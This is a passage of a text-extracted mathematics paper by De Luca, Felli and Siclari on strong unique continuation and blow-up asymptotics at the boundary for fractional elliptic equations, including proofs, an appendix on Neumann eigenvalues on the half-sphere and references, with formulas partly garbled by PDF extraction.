+ and (127) we deduce that, for every r ∈ (0, r0],
2859
+ (128)
2860
+ � r
2861
+ 0
2862
+ ρ−m0−N−1+2s|Υm0,k(ρ)| dρ ≤ const
2863
+
2864
+ r +
2865
+ � r
2866
+ 0
2867
+ ρ−1+
2868
+ 4s2ε
2869
+ N+2sε dρ
2870
+
2871
+ ≤ const r
2872
+ 4s2ε
2873
+ N+2sε ,
2874
+ thus proving (124). Moreover we have that
2875
+ (129)
2876
+ � r0
2877
+ 0
2878
+ ρm0−1|Υm0,k(ρ)| dρ < +∞,
2879
+ as a consequence of (124), since in a neighbourhood of 0, ρm0−1 ≤ ρ−m0−N−1+2s.
2880
+ Now we claim that, for every r ∈ (0, r0],
2881
+ (130)
2882
+ cm0,k(r) +
2883
+ � r
2884
+ 0
2885
+ ρm0−1Υm0,k(ρ) dρ = 0
2886
+
2887
+ 24
2888
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
2889
+ To prove (130) we argue by contradiction. If there exists r ∈ (0, r0] such that (130) does not hold
2890
+ true, then by (123), (124) and (129)
2891
+ ϕm0,k(λ) ∼ m0λ−m0−N+2s
2892
+ 2m0 + N − 2s
2893
+
2894
+ cm0,k(r) +
2895
+ � r
2896
+ 0
2897
+ ρm0−1Υm0,k(ρ) dρ
2898
+
2899
+ as λ → 0+.
2900
+ From this, it follows that
2901
+ (131)
2902
+ � r0
2903
+ 0
2904
+ λN−1−2s|ϕm0,k(λ)|2dλ = +∞,
2905
+ since N − 2s + 2m0 > 0. On the other hand, from (118), the Parseval identity and (32) we deduce
2906
+ the following estimate
2907
+ � r0
2908
+ 0
2909
+ λN−1−2s|ϕm0,k(λ)|2 dλ ≤
2910
+ � r0
2911
+ 0
2912
+ λN−1−2s
2913
+ ��
2914
+ S+ θ1−2s
2915
+ N+1|W(λθ)|2 dS
2916
+
2917
+
2918
+ =
2919
+ � r0
2920
+ 0
2921
+ λ−2
2922
+ ��
2923
+ S+
2924
+ λ
2925
+ t1−2s|W|2 dS
2926
+
2927
+ dλ =
2928
+
2929
+ B+
2930
+ r0
2931
+ t1−2s |W(z)|2
2932
+ |z|2
2933
+ dz < +∞,
2934
+ which contradicts (131). Hence (130) is proved. From (130) and (128) it follows that, for every
2935
+ r ∈ (0, r0],
2936
+ (132)
2937
+ λ−m0−N+2s
2938
+ ����cm0,k(r) +
2939
+ � r
2940
+ λ
2941
+ ρm0−1Υm0,k(ρ) dρ
2942
+ ���� = λ−m0−N+2s
2943
+ �����
2944
+ � λ
2945
+ 0
2946
+ ρm0−1Υm0,k(ρ) dρ
2947
+ �����
2948
+ ≤ λ−m0−N+2s
2949
+
2950
+ λ2m0+N−2s
2951
+ � λ
2952
+ 0
2953
+ ρ−m0−N−1+2s|Υm0,k(ρ)| dρ
2954
+
2955
+ ≤ const λm0+
2956
+ 4s2ε
2957
+ N+2sε .
2958
+ We finally deduce (120) combining (123), (130) and (132).
2959
+
2960
+ Proposition 5.4. Let γ be as in (87). Then
2961
+ (133)
2962
+ lim
2963
+ λ→0+ λ−2γH(λ) > 0.
2964
+ Proof. By (53), the Parseval identity and (118) we have that
2965
+ (134)
2966
+ H(λ) =
2967
+
2968
+ S+ θ1−2s
2969
+ N+1 µ(λθ)|W(λθ)|2 dS = (1 + O(λ))
2970
+
2971
+
2972
+ m=1
2973
+ Mm
2974
+
2975
+ k=1
2976
+ |ϕm,k(λ)|2.
2977
+ Let m0 ∈ N \ {0} be such that γ = m0 according to Proposition 5.2. We argue by contradiction
2978
+ and assume that 0 = limλ→0+ λ−2γH(λ) = limλ→0+ λ−2m0H(λ).
2979
+ In view of (134) this would
2980
+ imply that
2981
+ lim
2982
+ λ→0+ λ−m0ϕm0,k(λ) = 0
2983
+ for every k ∈ {1, . . . , Mm0}.
2984
+ Therefore, from (120) it follows that, for all k ∈ {1, . . ., Mm0} and r ∈ (0, r0],
2985
+ ϕm0,k(r)
2986
+ rm0
2987
+ + m0r−2m0−N+2s
2988
+ 2m0 + N − 2s
2989
+ � r
2990
+ 0
2991
+ ρm0−1Υm0,k(ρ) dρ
2992
+ + m0 + N − 2s
2993
+ 2m0 + N − 2s
2994
+ � r
2995
+ 0
2996
+ ρ−m0−N−1+2sΥm0,k(ρ) dρ = 0,
2997
+ so that, substituting into (120), we obtain that
2998
+ ϕm0,k(λ) = − m0 + N − 2s
2999
+ 2m0 + N − 2sλm0
3000
+ � λ
3001
+ 0
3002
+ ρ−m0−N−1+2sΥm0,k(ρ) dρ + O
3003
+
3004
+ λm0+
3005
+ 4s2ε
3006
+ N+2sε
3007
+
3008
+ as λ → 0+. Hence, from (128) we infer that
3009
+ (135)
3010
+ ϕm0,k(λ) = O
3011
+
3012
+ λm0+
3013
+ 4s2ε
3014
+ N+2sε
3015
+
3016
+ as λ → 0+
3017
+ for all k ∈ {1, . . ., Mm0}.
3018
+
3019
+ STRONG UNIQUE CONTINUATION FROM THE BOUNDARY
3020
+ 25
3021
+ Moreover, estimate (91) with σ =
3022
+ 2s2ε
3023
+ N+2sε implies that
3024
+ (136)
3025
+ 1
3026
+
3027
+ H(λ)
3028
+ = O
3029
+
3030
+ λ−m0−
3031
+ 2s2ε
3032
+ N+2sε
3033
+
3034
+ as λ → 0+.
3035
+ Since
3036
+ ϕm0,k(λ) =
3037
+
3038
+ H(λ)
3039
+
3040
+ S+ θ1−2s
3041
+ N+1 V λ(θ)Ym0,k(θ) dS
3042
+ for all k ∈ {1, . . ., Mm0}
3043
+ by (118) and (94), from (135) and (136) we deduce that
3044
+ (137)
3045
+
3046
+ S+ θ1−2s
3047
+ N+1 V λ(θ)Ψ(θ) dS = O
3048
+
3049
+ λ
3050
+ 2s2ε
3051
+ N+2sε
3052
+
3053
+ as λ → 0+,
3054
+ for every Ψ ∈ Span{Ym0,k : k ∈ {1, . . .Mm0}}. By (24), (25), (28) and Proposition 5.2, for any
3055
+ sequence λn → 0+, there exist a subsequence λnh → 0+ and Ψ ∈ Span{Ym0,k : k ∈ {1, . . . Mm0}}
3056
+ such that ∥Ψ∥L2(S+,θ1−2s
3057
+ N+1 ) = 1 and
3058
+ lim
3059
+ h→+∞
3060
+
3061
+ S+ θ1−2s
3062
+ N+1 V λnh (θ)Ψ(θ) dS =
3063
+
3064
+ S+ θ1−2s
3065
+ N+1 |Ψ|2 dS = 1,
3066
+ thus contradicting (137).
3067
+
3068
+ Theorem 5.5. Let W be a non trivial weak solution to (62). Let γ be as in (87) and m0 ∈ N\{0}
3069
+ be such that γ = m0, according to Proposition 5.2. Let {Ym0,k}k∈{1,...,Mm0 } be as in (25), with
3070
+ Vm0 and Mm0 defined as in (23) and (24) respectively. Then
3071
+ λ−m0W(λz) → |z|m0
3072
+ Mm0
3073
+
3074
+ k=1
3075
+ βkYm0,k
3076
+ � z
3077
+ |z|
3078
+
3079
+ as λ → 0+
3080
+ strongly in H1(B+
3081
+ 1 , t1−2s),
3082
+ where (β1, . . . , βMm0) ̸= (0, . . . , 0) and, for every k ∈ {1, . . . , Mm0},
3083
+ (138)
3084
+ βk = ϕm0,k(r)
3085
+ rm0
3086
+ + m0r−2m0−N+2s
3087
+ (2m0 + N − 2s)
3088
+ � r
3089
+ 0
3090
+ ρm0−1Υm0,k(ρ) dρ
3091
+ + m0 + N − 2s
3092
+ 2m0 + N − 2s
3093
+ � r
3094
+ 0
3095
+ ρ−m0−N−1+2sΥm0,k(ρ) dρ,
3096
+ for all r ∈ (0, r0], where ϕm0,k is defined in (118) and Υm0,k in (119) .
3097
+ Proof. From Proposition 5.2, (25), and (133) it follows that, for any sequence {λn} such that
3098
+ λn → 0+ as n → ∞, there exist a subsequence {λnh} and real numbers β1, . . . , βMm0 such that
3099
+ (β1, . . . , βMm0 ) ̸= (0, . . . , 0) and
3100
+ (139)
3101
+ λ−m0
3102
+ nh
3103
+ W(λnhz) → |z|m0
3104
+ Mm0
3105
+
3106
+ k=1
3107
+ βkYm0,k
3108
+ � z
3109
+ |z|
3110
+
3111
+ as h → +∞
3112
+ strongly in H1(B+
3113
+ 1 , t1−2s).
3114
+ We claim that the numbers β1, . . . βMm0 depend neither on the sequence {λn} nor on its subse-
3115
+ quence {λnh}. Letting ϕm0,k be as (118), for every k ∈ {1, . . ., Mm0}
3116
+ (140)
3117
+ lim
3118
+ h→+∞ λ−m0
3119
+ nh
3120
+ ϕm0,k(λnh) =
3121
+ lim
3122
+ h→+∞
3123
+
3124
+ S+ θ1−2s
3125
+ N+1 λ−m0
3126
+ nh
3127
+ W(λnhθ)Ym0,k(θ) dS = βk,
3128
+ thanks to (139) and the compactness of the trace operator in (28). Combining (140) and (120)
3129
+ we obtain that, for every r ∈ (0, r0], βk = limh→+∞ λ−m0
3130
+ nh
3131
+ ϕm0,k(λnh) is equal to the right hand
3132
+ side in (138), thus proving the claim. By Urysohn’s subsequence principle we conclude that the
3133
+ convergence in (139) holds as λ → 0+, hence the proof is complete.
3134
+
3135
+
3136
+ 26
3137
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
3138
+ 6. Proofs of the main results
3139
+ The proof of Theorem 1.3 is obtained as a consequence of the following result.
3140
+ Theorem 6.1. Let N > 2s and Ω ⊂ RN be a bounded Lipschitz domain such that 0 ∈ ∂Ω and
3141
+ (10)–(12) are satisfied with x0 = 0 for some function g and R > 0. Let U be a non trivial solution
3142
+ to (17) in the sense of (18), with h satisfying (7), and let
3143
+ (141)
3144
+ �U(z) =
3145
+
3146
+ U(z),
3147
+ if z ∈ CΩ ∩ F(B+
3148
+ r0),
3149
+ 0,
3150
+ if z ∈ F(B+
3151
+ r0) \ CΩ,
3152
+ with F and r0 being as in Proposition 3.1. Then there exist m0 ∈ N \ {0} (which is odd in the
3153
+ case N = 1) such that
3154
+ (142)
3155
+ λ−m0 �U(λz)
3156
+
3157
+ |z|m0
3158
+ Mm0
3159
+
3160
+ k=1
3161
+ βk �Ym0,k
3162
+ � z
3163
+ |z|
3164
+
3165
+ as λ
3166
+
3167
+ 0+
3168
+ strongly in H1(B+
3169
+ 1 , t1−2s),
3170
+ where Mm0 is as in (24),
3171
+ (143)
3172
+ �Ym0,k(θ′, θN, θN+1) =
3173
+
3174
+ Ym0,k(θ′, θN, θN+1),
3175
+ if θN < 0,
3176
+ 0,
3177
+ if θN ≥ 0,
3178
+ with {Ym0,k}k∈{1,...,Mm0} being as in (25), and the coefficients βk satisfy (138).
3179
+ Proof. If U is a non trivial solution of (17), then the function W defined in (38) and (59) belongs
3180
+ to H1(B+
3181
+ r0, t1−2s) and is a non trivial weak solution to (62). Letting
3182
+
3183
+ W(z) =
3184
+
3185
+ W(z),
3186
+ if z ∈ Qr0,
3187
+ 0,
3188
+ if z ∈ B+
3189
+ r0 \ Qr0,
3190
+ where Qr0 is defined in (37), by Remark 3.4 we have that �
3191
+ W ∈ H1(B+
3192
+ r0, t1−2s). Moreover Theorem
3193
+ 5.5 implies that
3194
+ λ−m0�
3195
+ W(λz) → �Φ(z)
3196
+ strongly in H1(B+
3197
+ 1 , t1−2s)
3198
+ as λ → 0+,
3199
+ where
3200
+ �Φ(z) = |z|m0
3201
+ Mm0
3202
+
3203
+ k=1
3204
+ βk �Ym0,k
3205
+ � z
3206
+ |z|
3207
+
3208
+ with βk as in (138). Hence, by homogeneity,
3209
+ (144)
3210
+ λ−m0�
3211
+ W(λz) → �Φ(z)
3212
+ strongly in H1(B+
3213
+ r , t1−2s)
3214
+ as λ → 0+
3215
+ for all r > 1.
3216
+ We note that
3217
+ (145)
3218
+ λ−m0 �U(λz) = λ−m0 �
3219
+ W(λGλ(z))
3220
+ and
3221
+
3222
+ � �U(λ·)
3223
+ λm0
3224
+
3225
+ = ∇
3226
+ � �
3227
+ W(λ·)
3228
+ λm0
3229
+
3230
+ (Gλ(z))JGλ(z)
3231
+ where
3232
+ Gλ(z) := 1
3233
+ λF −1(λz)
3234
+ for any λ ∈ (0, 1] and z ∈ 1
3235
+ λF(Br+
3236
+ 0 ).
3237
+ From Proposition 3.1 we deduce that
3238
+ Gλ(z) = z + O(λ)
3239
+ and
3240
+ JGλ(z) = IdN+1 +O(λ)
3241
+ as λ → 0+
3242
+ uniformly respect to z ∈ B+
3243
+ 1 . It follows that, if fλ → f in L2(B+
3244
+ r , t1−2s) as λ → 0+ for some
3245
+ r > 1, then fλ ◦ Gλ → f in L2(B+
3246
+ 1 , t1−2s) as λ → 0+. Then we conclude in view of (144) and
3247
+ (145).
3248
+
3249
+ Proof of Theorem 1.3 . It follows directly from Theorem 6.1 up to a translation.
3250
+
3251
+ Passing to traces in (142) we obtain the following blow-up result for solutions to (1).
3252
+
3253
+ STRONG UNIQUE CONTINUATION FROM THE BOUNDARY
3254
+ 27
3255
+ Theorem 6.2. Let N > 2s and Ω ⊂ RN be a bounded Lipschitz domain such that 0 ∈ ∂Ω and
3256
+ (10)–(12) are satisfied with x0 = 0 for some function g and R > 0. Let u ∈ Hs(Ω) be a non trivial
3257
+ solution of (1) in the sense of (8), with h satisfying (7), and let �u(x) = ι(u) with ι defined in (3).
3258
+ Then there exists m0 ∈ N \ {0} (which is odd in the case N = 1) such that
3259
+ λ−m0�u(λx) → |x|m0
3260
+ Mm0
3261
+
3262
+ k=1
3263
+ βk �Ym0,k
3264
+ � x
3265
+ |x|, 0
3266
+
3267
+ as λ → 0+
3268
+ strongly in Hs(B′
3269
+ 1),
3270
+ where Mm0 is as in (24), {�Ym0,k}k∈{1,...,Mm0} are defined in (143) and the coefficients βk satisfy
3271
+ (138).
3272
+ Proof. As observed in [7] and recalled at page 5, if u ∈ Hs(Ω) is a non trivial solution of (1), then
3273
+ its extension H(u) = U is non trivial solution to (17). Hence the corresponding function �U defined
3274
+ in (141) satisfies (142) by Theorem 6.1. Since �u = Tr(�U), the conclusion follows from Proposition
3275
+ 2.2.
3276
+
3277
+ Proof of Theorem 1.2. It follows directly from Theorem 6.2 up to a translation.
3278
+
3279
+ Appendix A. Neumann eigenvalues on the half-sphere under a symmetry condition
3280
+ In order to determine the eigenvalues of (19), we first need the following preliminary lemma.
3281
+ Lemma A.1. Let m, N ∈ N\ {0} and let u ∈ Cm(RN)\ {0} be a positively homogeneous function
3282
+ of degree m, i.e.
3283
+ (146)
3284
+ u(λx) = λmu(x)
3285
+ for every λ > 0 and x ∈ RN.
3286
+ Then u is a homogeneous polynomial of degree m.
3287
+ Proof. Let α = (α1, . . . , αN) ∈ NN be a multindex, |α| := �N
3288
+ i=1 αi, and xα = xα1
3289
+ 1 . . . xαN
3290
+ N
3291
+ for any
3292
+ x = (x1, . . . , xN) ∈ RN. By Taylor’s Theorem with Lagrange remainder centered at 0, for any
3293
+ x ∈ RN there exists t ∈ [0, 1] such that
3294
+ u(x) =
3295
+
3296
+ |α|<m
3297
+
3298
+ ∂|α|u
3299
+ ∂xα (0)xα +
3300
+
3301
+ |α|=m
3302
+
3303
+ ∂|α|u
3304
+ ∂xα (tx)xα,
3305
+ where cα > 0 are positive constants depending on α and ∂|α|u
3306
+ ∂xα stands for
3307
+ ∂|α|u
3308
+ ∂xα1
3309
+ 1 ···∂x
3310
+ αN
3311
+ N . By (146),
3312
+ one can easily prove that ∂|α|u
3313
+ ∂xα is a positively homogeneous function of degree m − |α| for all α
3314
+ with |α| ≤ m. Thus, combining this fact with the continuity of ∂|α|u
3315
+ ∂xα , it is clear that ∂|α|u
3316
+ ∂xα (0) = 0
3317
+ for every α ∈ NN with |α| < m. On the other hand, for every α ∈ NN with |α| = m, we have
3318
+ that ∂|α|u
3319
+ ∂xα is constant and exactly equal to ∂|α|u
3320
+ ∂xα (0), being a homogeneous function of degree 0. It
3321
+ follows that
3322
+ u(x) =
3323
+
3324
+ |α|=m
3325
+
3326
+ ∂|α|u
3327
+ ∂xα (0)xα
3328
+ for every x ∈ RN,
3329
+ hence proving the claim.
3330
+
3331
+ Proposition A.2. All the eigenvalues of problem (19) are characterized by formula (22).
3332
+ Proof. We start by proving that if µ is an eigenvalue of (19), then µ = m2 + m(N − 2s) for some
3333
+ m ∈ N \ {0}. If µ is an eigenvalue, then there exists a non trivial solution Y of (19). A direct
3334
+ computation shows that Y is a weak solution to (19) if and only if the function
3335
+ U(z) := |z|γY
3336
+ � z
3337
+ |z|
3338
+
3339
+ ,
3340
+ z ∈ RN+1
3341
+ +
3342
+ ,
3343
+ with
3344
+ (147)
3345
+ γ := −N − 2s
3346
+ 2
3347
+ +
3348
+ ��N − 2s
3349
+ 2
3350
+ �2
3351
+ + µ,
3352
+
3353
+ 28
3354
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
3355
+ belongs to H1
3356
+ loc(RN+1
3357
+ +
3358
+ , t1−2s), is odd with respect to yN and weakly solves
3359
+ (148)
3360
+
3361
+ div(t1−2s∇U) = 0,
3362
+ in RN+1
3363
+ +
3364
+ ,
3365
+ limt→0+ t1−2s ∂U
3366
+ ∂ν = 0,
3367
+ on RN.
3368
+ Hence, if µ is an eigenvalue of (19), there exists a solution U of (148) which is odd with respect
3369
+ to yN and positively homogeneous of degree γ. The regularity result in [22, Theorem 1.1] ensures
3370
+ that U ∈ C∞(B+
3371
+ 1 ). Then there exists m ∈ N \ {0} such that γ = m and so µ = m2 + m(N − 2s)
3372
+ thanks to (147). We notice that the case m = 0 is excluded since in that case µ = 0 and 0 is not
3373
+ an eigenvalue. Indeed, if by contradiction 0 is an eigenvalue, letting Y be an eigenfunction of (19)
3374
+ with associated eigenvalue 0 and choosing in (21) Ψ = Y , we would have that Y is constant and
3375
+ Y ̸≡ 0, hence Y /∈ H1
3376
+ odd(S+, θ1−2s
3377
+ N+1 ) which is a contradiction (see (20)).
3378
+ Viceversa, in order to prove that the numbers given in (22) are eigenvalues of (19), we need
3379
+ to show that, for any fixed m ∈ N \ {0}, there actually exist an eigenfunction associated to
3380
+ m2 + m(N − 2s) if N > 1 and an eigenfunction associated to (2m − 1)2 + (2m − 1)(N − 2s) if
3381
+ N = 1. Equivalently, for any fixed m ∈ N \ {0} we have to find a non trivial solution to (148)
3382
+ which is odd with respect to yN and positively homogeneous with degree m if N > 1 and 2m − 1
3383
+ if N = 1. To this end, we observe that equation div(t1−2s∇U) = 0 can be rewritten as
3384
+ (149)
3385
+ ∆U + 1 − 2s
3386
+ t
3387
+ Ut = 0.
3388
+ We first consider the case N = 1. If n = 2m − 1 with m ∈ N \ {0}, we consider the following
3389
+ homogeneous polynomial of degree 2m − 1, odd with respect to y1,
3390
+ (150)
3391
+ U1,m(y1, t) :=
3392
+ m−1
3393
+
3394
+ k=0
3395
+ aky2k+1
3396
+ 1
3397
+ t2m−2k−2,
3398
+ with a0, . . . , am−1 ∈ R. A direct computation shows that U1,m is a solution of (148), and equiva-
3399
+ lently of (149), if and only if
3400
+ ak = −2[(m − k)2 − s(m − k)]
3401
+ k(2k + 1)
3402
+ ak−1
3403
+ for all k ∈ {1, . . . , m − 1}.
3404
+ Thus, for example choosing a0 := 1, we have constructed a non trivial solution to (148) which is
3405
+ odd with respect to y1 and positively homogeneous of degree 2m − 1.
3406
+ To complete the proof of (22) in the case N = 1, it remains to show that, if n = 2m with
3407
+ m ∈ N \ {0}, then n2 + n(N − 2s) is not an eigenvalue of (19).
3408
+ To this aim, we argue by
3409
+ contradiction and assume that (2m)2 + 2m(N − 2s) is an eigenvalue of (19) associated to an
3410
+ eigenfunction Ψ. Then the function defined as
3411
+ U(z) = |z|γΨ
3412
+ � z
3413
+ |z|
3414
+
3415
+ ,
3416
+ z = (y1, t) ∈ R2
3417
+ +,
3418
+ with
3419
+ γ = −N − 2s
3420
+ 2
3421
+ +
3422
+ ��N − 2s
3423
+ 2
3424
+ �2
3425
+ + (2m)2 + 2m(N − 2s) = 2m
3426
+ is a non trivial solution to (148), odd with respect to y1. Hence, if we consider the even reflection
3427
+ of U with respect to t, namely the function �U(y1, t) := U(y1, |t|), we have that �U is a solution of
3428
+ div(|t|1−2s∇�U) = 0 in R2. Then, by [22, Theorem 1.1] we deduce that �U ∈ C∞(R2). Moreover,
3429
+ �U is positively homogeneous of degree γ = 2m, therefore from Lemma A.1 it follows that �U is a
3430
+ homogeneous polynomial of degree 2m, namely
3431
+ �U(y1, t) =
3432
+ 2m
3433
+
3434
+ k=0
3435
+ aky2m−k
3436
+ 1
3437
+ tk
3438
+ where ak = 0 if k is odd since �U is even with respect to t. In this way ˜U turns out to be even also
3439
+ with respect to y1 and this contradicts the fact that U is non trivial and odd with respect to y1.
3440
+
3441
+ STRONG UNIQUE CONTINUATION FROM THE BOUNDARY
3442
+ 29
3443
+ If N = 2 and m ∈ N \ {0} is odd, then we consider U2(y1, y2, t) := U1,n(y2, t), where U1,n is
3444
+ defined in (150) and n ∈ N \ {0} is such that m = 2n − 1. Such U2 is a positively homogeneous
3445
+ solution of (148) of degree m, odd with respect to y2. If m ∈ N \ {0} is even, i.e. m = 2n with
3446
+ n ∈ N \ {0}, then we define
3447
+ U3(y1, y2, t) :=
3448
+ n−1
3449
+
3450
+ k=0
3451
+ aky2k+1
3452
+ 1
3453
+ y2n−2k−1
3454
+ 2
3455
+ ,
3456
+ with a0, . . . , an−1 ∈ R. A direct computation shows that U3 is a solution of (148), and equivalently
3457
+ of (149), if and only if
3458
+ ak+1 = −[2(n − k)2 − 3n + 3k + 1]
3459
+ (2k2 + 5k + 3)
3460
+ ak
3461
+ for all k ∈ {0, . . . , n − 2}.
3462
+ Then, choosing for example again a0 = 1, we obtain that U3 is a solution of (148) which is
3463
+ positively homogeneous of degree m and odd with respect to y2, as desired.
3464
+ If N > 2, for any m ∈ N \ {0} there exists a harmonic homogeneous polynomial P ̸≡ 0 in
3465
+ the variables y1, . . . , yN−1, of degree m − 1. Then U4(y1, . . . , yN−1, yN, t) := P(y1, . . . , yN−1) yN
3466
+ is a non trivial solution to (148) which is odd with respect to yN and positively homogeneous of
3467
+ degree m.
3468
+
3469
+ References
3470
+ [1] Abatangelo, N., and Dupaigne, L. Nonhomogeneous boundary conditions for the spectral fractional Lapla-
3471
+ cian. Ann. Inst. H. Poincar´e C Anal. Non Lin´eaire 34, 2 (2017), 439–467.
3472
+ [2] Adolfsson, V., and Escauriaza, L. C1,α domains and unique continuation at the boundary. Comm. Pure
3473
+ Appl. Math. 50, 10 (1997), 935–969.
3474
+ [3] Bonforte, M., Sire, Y., and V´azquez, J. L. Existence, uniqueness and asymptotic behaviour for fractional
3475
+ porous medium equations on bounded domains. Discrete Contin. Dyn. Syst. 35, 12 (2015), 5725–5767.
3476
+ [4] Br¨andle, C., Colorado, E., de Pablo, A., and S´anchez, U. A concave-convex elliptic problem involving
3477
+ the fractional Laplacian. Proc. Roy. Soc. Edinburgh Sect. A 143, 1 (2013), 39–71.
3478
+ [5] Brasco, L., Lindgren, E., and Parini, E. The fractional Cheeger problem. Interfaces Free Bound. 16, 3
3479
+ (2014), 419–458.
3480
+ [6] Caffarelli, L. A., and Stinga, P. R. Fractional elliptic equations, Caccioppoli estimates and regularity.
3481
+ Ann. Inst. H. Poincar´e C Anal. Non Lin´eaire 33, 3 (2016), 767–807.
3482
+ [7] Capella, A., D´avila, J., Dupaigne, L., and Sire, Y. Regularity of radial extremal solutions for some
3483
+ non-local semilinear equations. Comm. Partial Differential Equations 36, 8 (2011), 1353–1384.
3484
+ [8] Chua, S.-K. Some remarks on extension theorems for weighted Sobolev spaces. Illinois J. Math. 38, 1 (1994),
3485
+ 95–126.
3486
+ [9] De Luca, A., Felli, V., and Vita, S. Strong unique continuation and local asymptotics at the boundary for
3487
+ fractional elliptic equations. Adv. Math. 400 (2022), Paper No. 108279, 67.
3488
+ [10] Di Nezza, E., Palatucci, G., and Valdinoci, E. Hitchhiker’s guide to the fractional Sobolev spaces. Bull.
3489
+ Sci. Math. 136, 5 (2012), 521–573.
3490
+ [11] Fall, M. M., and Felli, V. Unique continuation property and local asymptotics of solutions to fractional
3491
+ elliptic equations. Comm. Partial Differential Equations 39, 2 (2014), 354–397.
3492
+ [12] Felli, V., and Siclari, G. Sobolev-type regularity and Pohozaev-type identities for some degenerate and
3493
+ singular problems. Atti Accad. Naz. Lincei Rend. Lincei Mat. Appl. 33, 3 (2022), 553–574.
3494
+ [13] Garofalo, N., and Lin, F.-H. Monotonicity properties of variational integrals, Ap weights and unique con-
3495
+ tinuation. Indiana Univ. Math. J. 35, 2 (1986), 245–268.
3496
+ [14] Grubb, G. Regularity of spectral fractional Dirichlet and Neumann problems. Math. Nachr. 289, 7 (2016),
3497
+ 831–844.
3498
+ [15] Jin, T., Li, Y., and Xiong, J. On a fractional Nirenberg problem, part I: blow up analysis and compactness
3499
+ of solutions. J. Eur. Math. Soc. (JEMS) 16, 6 (2014), 1111–1171.
3500
+ [16] Kufner, A. Weighted Sobolev spaces. A Wiley-Interscience Publication. John Wiley & Sons, Inc., New York,
3501
+ 1985.
3502
+ [17] Lions, J.-L., and Magenes, E. Non-homogeneous boundary value problems and applications. Vol. I. Die
3503
+ Grundlehren der mathematischen Wissenschaften, Band 181. Springer-Verlag, New York-Heidelberg, 1972.
3504
+ [18] Lischke, A., Pang, G., Gulian, M., and et al. What is the fractional Laplacian? A comparative review
3505
+ with new results. J. Comput. Phys. 404 (2020), 109009, 62.
3506
+ [19] Opic, B., and Kufner, A. Hardy-type inequalities, vol. 219 of Pitman Research Notes in Mathematics Series.
3507
+ Longman Scientific & Technical, Harlow, 1990.
3508
+
3509
+ 30
3510
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
3511
+ [20] R¨uland, A. Unique continuation for fractional Schr¨odinger equations with rough potentials. Comm. Partial
3512
+ Differential Equations 40, 1 (2015), 77–114.
3513
+ [21] Servadei, R., and Valdinoci, E. On the spectrum of two different fractional operators. Proc. Roy. Soc.
3514
+ Edinburgh Sect. A 144, 4 (2014), 831–855.
3515
+ [22] Sire, Y., Terracini, S., and Vita, S. Liouville type theorems and regularity of solutions to degenerate or
3516
+ singular problems part I: even solutions. Comm. Partial Differential Equations 46, 2 (2021), 310–361.
3517
+ [23] Stinga, P. R., and Torrea, J. L. Extension problem and Harnack’s inequality for some fractional operators.
3518
+ Comm. Partial Differential Equations 35, 11 (2010), 2092–2122.
3519
+ [24] Tao, X., and Zhang, S. Weighted doubling properties and unique continuation theorems for the degenerate
3520
+ Schr¨odinger equations with singular potentials. J. Math. Anal. Appl. 339, 1 (2008), 70–84.
3521
+ [25] Yu, H. Unique continuation for fractional orders of elliptic equations. Ann. PDE 3, 2 (2017), Paper No. 16,
3522
+ 21.
3523
+ Alessandra De Luca
3524
+ Dipartimento di Scienze Molecolari e Nanosistemi, Universit`a Ca’ Foscari Venezia,
3525
+ Via Torino 155, 30172 Venezia Mestre, Italy.
3526
+ Email address: alessandra.deluca@unive.it
3527
+ Veronica Felli and Giovanni Siclari
3528
+ Dipartimento di Matematica e Applicazioni, Universit`a degli Studi di Milano-Bicocca,
3529
+ Via Cozzi 55, 20125 Milano, Italy.
3530
+ Email address: veronica.felli@unimib.it, g.siclari2@campus.unimib.it
3531
+
ZNFJT4oBgHgl3EQf7S0N/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff